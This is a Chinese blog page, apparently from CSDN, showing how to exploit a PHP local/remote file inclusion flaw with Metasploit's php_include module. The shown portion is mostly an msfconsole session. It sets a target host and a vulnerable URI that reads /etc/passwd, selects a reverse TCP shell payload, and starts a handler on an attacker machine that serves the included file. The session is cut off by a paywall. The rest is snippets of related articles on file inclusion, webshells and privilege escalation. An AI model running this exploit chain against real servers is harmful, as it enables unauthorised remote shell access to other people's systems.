PHP文件包含漏洞 Metasploit

最新推荐文章于 2023-12-18 07:43:51 发布
最新推荐文章于 2023-12-18 07:43:51 发布
阅读量2.2k 收藏
点赞数
分类专栏: web漏洞 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/121299492
版权
本文介绍了PHP文件包含漏洞的概念,并通过实例展示了如何使用Metasploit框架生成PHP DOOR,以及如何利用/LFI.php接口连接到远程服务器,从而获取Shell控制。
摘要由CSDN通过智能技术生成

原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt
然后/lfi.php?file=http://5.5.5.3:1111/1.txt

启动METASPLOIT

msf > use exploit/unix/webapp/php_include 
msf  exploit(php_include) > set RHOST 5.5.5.2
RHOST => 5.5.5.2
msf  exploit(php_include) > set PATH /
PATH => /
msf  exploit(php_include) > set PHPURI lif.php?file=/etc/passwd
PHPURI => lif.php?file=/etc/passwd
msf  exploit(php_include) > set URIPATH /1.txt
URIPATH => /1.txt
msf  exploit(php_include) > set PAYLOAD generic/shell_reverse_tcp 
PAYLOAD => generic/shell_reverse_tcp
msf  exploit(php_include) > exploit 

[*] Started reverse handler on 5.5.5.3:4444 
[*] Using URL: http://5.5.5.3:1111/1.txt
[*] PHP include ser
了解本专栏 订阅专栏 解锁全文 超级会员免费看
小韩韩啊
关注
专栏目录
订阅专栏
文件包含漏洞挖掘(一)
记录并分享学习安全的知识点..
02-07 1984
一、概述 文件包含漏洞是指通过构造一个恶意URL来读取非WEB目录中的文件。正常情况下用户通过浏览器访问的范围被限制在被限制在WEB目录里,系统中的其他目录是无法访问的。 以PHP为例,服务器在执行一个PHP文件的时候,可以加载并执行其他文件的php代码,这个功能是通过以下四个函数其中之一来实现的: (1)incllude() (2)require() (3)include_once() (4)requre() 其中以include为例,作用是将文件包含进来,如果发生错误就会警告,并继
metasploit-pro-trial-grabber:这是一个PHP命令行脚本,用于自动获取metasploit 14天专业试用版密钥
05-31
Metasploit Pro Trial Grabber 注意力 这个脚本不会再工作了! 介绍 这是一个 PHP 命令行脚本,用于自动获取 Metasploit 的 [14-DAYs pro trial key]。 真的很累,因为它每周都手动向 Metasploit 提交试用请求以获得 pro 密钥? 今天你有了新的选择! 只需运行此脚本并稍等片刻,它就会为您生成一个新的专业试用密钥。 它使用和来获取联系信息进行注册,都是假的和一次性的。 所有注册过程都是自动化的,所以现在享受吧! 捐款 如果您喜欢这个脚本,请给我买杯咖啡? 捐赠者 2014-07-23:匿名 - (~ 300TWD) 环境 Linux: :1.0.8 x86 视窗: Windows XP 专业服务包 3 x86 操作系统: :优胜美地 10.10 安装 Linux: # clone the
Using the Metasploit PHP Remote File Include Module
cnbird's blog
05-24 1375
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHP
metasploit php,Metasploit后渗透技巧[1]_91Ri.org
weixin_39875028的博客
03-25 309
对于一次成功的渗透测试,往往都需要很多优秀的工具进行辅助。在渗透测试中听说用的最多的是一个叫做metasploit。因此想从屌丝脚本小子变成了土豪级脚本小子。所以开始了metasploit学习之旅,希望在记录下自己成长的足迹,把没有学习到知识点,无论大小都记录下来。因此有了下面和下下面的相关文章,如有错误请给予指正。一、问题描述在渗透测试时,metasploit往往作为后渗透工具,(因为远程溢出越...
metasploit渗透测试魔鬼训练营 4.3.4 文件包含
yrx0619的专栏
02-24 381
metasploit中4.3.4文件包含攻击无法成功 修改 http://192.168.10.144/dvwa/vulnerabilities/fi/?page=includ.php 为 http://192.168.10.144/dvwa/vulnerabilities/fi/?page=/etc/passwd 提示 ERROR: File not found! 首先通过...
php-msf 负载均衡,Metasploit常用操作命令
weixin_30227565的博客
03-26 234
0x00 简述0x01基本操作1.启动MSF这里用的是kali里面的msf,需要开启msf依赖的数据库为PostgreSQL:service postgresql start# 启动 postgresql数据库msfconsole# 启动msf这样就算是启动成功了,左下角会变成msf >。2.配置和生成木马在kali下用ifconfig查询当前攻击机的ip,用于生成木马和配置监听。ifcon...
msf上传文件到服务器,Metasploit 文件包含漏洞
05-25
Metasploit 中,可以使用“exploit/multi/http/php_file_upload”模块来利用 PHP 文件包含漏洞。该模块可以通过 HTTP 协议向目标服务器上传恶意 PHP 文件,然后执行该文件以获取对服务器的控制权。 以下是使用 ...
Metasploit 文件上传漏洞渗透测试实战
最新发布
悦分享
12-18 973
上传漏洞广泛存在于各种Web应用程序中,而且造成的后果极为严重。渗透测试者往往会利用这个漏洞Web服务器上传一个携带恶意代码的文件,并设法在Web服务器上运行恶意代码。渗透测试者可能会将钓鱼页面或者挖矿木马应用程序注入Web应用程序中,或者直接破坏服务器中的信息,或者盗取敏感信息。在这些行为中对渗透测试者诱惑力最大的是实现对目标系统的远程控制。为了达到这个目的,渗透测试者需要通过Web应用程序上传一个远程控制程序。远程控制程序指的是可以在一台设备上操纵另一台设备的软件。
kali linux渗透攻击基于漏洞工具Metasploit
xiaoma920的博客
05-25 835
该文章只提供学习,禁止做违法的事情,任何后果与作者无关2.第二百八十五条第二款 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
渗透之——Metasploit渗透php-utility-belt程序
冰河的专栏
01-17 1611
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86526103 攻击机 kali 192.168.109.137 靶机:Win XP 192.168.109.141 应用程序 php-utility-belt (可以到链接:https://download.csdn.net/download/l1028386804/109...
利用MetasploitPHP5.2.4渗透测试提权
渗透测试
05-06 1681
文章目录前言一、启动metasploit数据库二、PHP5.2.4渗透测试1.设置相关渗透模块2.提权总结 前言 针对PHP5.2.4进行渗透测试提权 一、启动metasploit数据库 启动metasploit在上一篇文章已经详细介绍 利用db_nmap扫描到的结果,在进行services -u 过滤结果 msf6 > services -u Services ======== host port proto name state info --
Metasploit - crack chinese caidao php backdoor
Nixawk
10-24 2868
Chopper Backdoor Client function set_action(){     // chopper_pwd  ---- Be used to set the input value // chopper_pass ---- PASSWORD to access the backdoor. // chopper_form ---- FORM to post t
利用Metasploit 打入ThinkPHP内网...
Ms08067安全实验室
07-06 1082
本文作者:dch(Ms08067实验室 SRSP TEAM小组成员)一、利用Metasploit进行攻击的流程图图1 Metasploit渗透流程二、Metasploit渗透攻击(1)通...
php渗透提权拿shell,Metasploit 之 webshell 提权
weixin_33751873的博客
03-13 486
本文所涉及的方法只能在已授权的机器上做测试。首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe型后门,一可以生成网页脚本类型的webshell ,通过生成webshell然后设置监听器,访问w...
msf php脚本提权,利用Metasploit提权Linux主机思路
weixin_39640904的博客
04-11 732
本帖最后由 小爱_Joker 于 2017-3-9 13:28 编辑大晚上的写个文章不容易而且有点小冷利用metasploit提权Linux主机 主要就是用msf生成一个马子 上传到webshell打开马子后 你就会发现你的msf已经建立了一个回话 下面进入正题PHP Meterpretermetasploit有一个名为PHP Meterpreter的payload,可创建具有meterpre...
这你不是你所常见的PHP文件包含漏洞(利用phpinfo)
Adminxe的博客
05-03 1472
0x01 前言 看到文件包含(+phpinfo ) 的问题,在上次众测中出现此题目,如果没打过CTF,可能真的很少见到这种问题,当然作为小白的我,也是很少遇到,毕竟都是第一次,那就来总结一波经验和操作,附赠EXP,借鉴网上大佬环境,进一步进行探索。 0x02 漏洞环境 执行如下命令启动环境: docker-compose up -d 目标环境是官方最新版PHP7.2,说明该漏洞与P...
文件包含漏洞
heizaier的博客
07-16 173
文件包含原理:就是在开发的时候未对包含的文件进行过滤,导致用户可以上传自己的图片木马而被当成php文件解析。 文件包含分类: 本地包含。 远程包含:需满足两个条件:allow_url_include=on、magic_quotes_gpc=off 如何快速挖包含漏洞:直接找源代码里面的4函数include(),include_once(),require()和require_once()。这2个涵数include(),include_once()...
PHP文件包含漏洞复现
春日野穹
09-17 3059
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值